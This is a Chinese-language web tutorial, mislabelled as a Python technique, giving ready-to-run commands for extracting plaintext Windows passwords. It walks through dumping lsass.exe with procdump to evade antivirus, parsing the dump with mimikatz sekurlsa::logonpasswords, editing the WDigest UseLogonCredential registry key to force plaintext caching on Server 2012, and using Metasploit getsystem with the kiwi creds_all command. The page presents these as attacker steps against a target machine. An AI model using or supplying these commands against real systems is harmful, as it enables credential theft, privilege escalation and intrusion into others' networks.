python简单直接获取windows明文密码操作技巧
01、Procdump+Mimikatz
利用procdump+Mimikatz 绕过杀软获取Windows明文密码。
(1)工具准备:
ProcDump:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
mimikatz:
https://github.com/gentilkiwi/mimikatz/
(2)Windows Server 2008 R2提取明文密码
在目标机器上生成存储文件:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt
如图:成功从内存中提取明文密码。
02、Window 2012 R2抓取密码
在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。
(1)修改注册表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
(2)用户administrator注销后重新登录,成功抓取到明文信息。
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt
03、MSF kiwi模块
使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。
提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。
meterpreter > getuid Server username: BYPASS-E97BA3FC\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
加载kiwi模块:
load kiwi
列举系统中的明文密码:
creds_all
以上就是python简单直接获取windows明文密码操作技巧的详细内容,更多关于python获取windows明文密码的资料请关注脚本之家其它相关文章!
相关文章
Python不改变Excel单元格样式方式—xls和xlsx两种格式
这篇文章主要介绍了Python不改变Excel单元格样式方式—xls和xlsx两种格式,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教2023-06-06Python新手入门之单引号、双引号与三引号的差异与应用示例
在Python当中表达字符串既可以使用单引号,也可以使用双引号,那两者有什么区别吗?下面这篇文章主要给大家介绍了关于Python新手入门之单引号、双引号与三引号的差异与应用示例,需要的朋友可以参考下2024-03-03
最新评论